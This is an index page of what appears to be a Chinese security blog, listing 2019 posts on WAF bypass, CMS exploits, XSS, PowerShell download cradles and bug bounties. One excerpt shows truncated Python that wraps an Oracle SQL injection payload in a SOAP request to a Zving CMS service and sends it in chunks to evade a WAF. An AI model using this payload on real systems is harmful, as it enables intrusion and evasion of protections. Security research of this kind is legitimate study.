Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

APK 调试遇到 安装失败 的一些问题

March 18, 2019

APK 调试遇到 安装失败 的一些问题

APK 调试遇到 安装失败 的一些问题

March 17, 2019

常见 CMS 漏洞 exp 案例集合

常见 CMS 漏洞 exp 案例集合

March 15, 2019

【WAF对抗】分块传输绕过 WAF | Using Chunked Transfer to Bypass WAF

分块传输绕过 WAF <!–more–> 基本信息 import requests from io import BytesIO def read_in_chunks(file_object, chunk_size=3): while True: data = file_object.read(chunk_size) if not data: break yield data data = r”’&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:web=&quot;http://webservice.cms.zving.com&quot;&gt; &lt;soapenv:Header/&gt; &lt;soapenv:Body&gt; &lt;web:addCatalog&gt; &lt;web:in0&gt;2&lt;/web:in0&gt; &lt;web:in1&gt;{sql}&lt;/web:in1&gt; &lt;web:in2&gt;1&lt;/web:in2&gt; &lt;web:in3&gt;1&lt;/web:in3&gt; &lt;/web:addCatalog&gt; &lt;/soapenv:Body&gt; &lt;/soapenv:Envelope&gt;”’ sql = r&quot;’ or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null–&quot; data = BytesIO(data.format(sql=sql)) […]

March 15, 2019

Burp Scanner DOM-based XSS issue

Burp Scanner DOM-based XSS issue

March 14, 2019

Download Cradles 是什么? (Powershell/Malware)

Download Cradles 是什么? (Powershell/Malware)

March 14, 2019

FireEye 对 APT 威胁组织的聚类分析的研究

Fireeye 对 威胁组织的聚类分析的研究

March 13, 2019

The Hacker Playbook 3: Cyber Space Kittens

The Hacker Playbook 3: Cyber Space Kittens

March 12, 2019

搭建 AutoSQLi 与 sqlmapapi 的简易使用

搭建 AutoSQLi 与 sqlmapapi 的简易使用

March 12, 2019

【Bug Bounty 阅读笔记】vimeo 从 SSRF 到潜在代码执行

vimeo 从 SSRF 到潜在代码执行报告阅读笔记

March 11, 2019

如何申请 Github DMCA 删除策略

Github DMCA 删除策略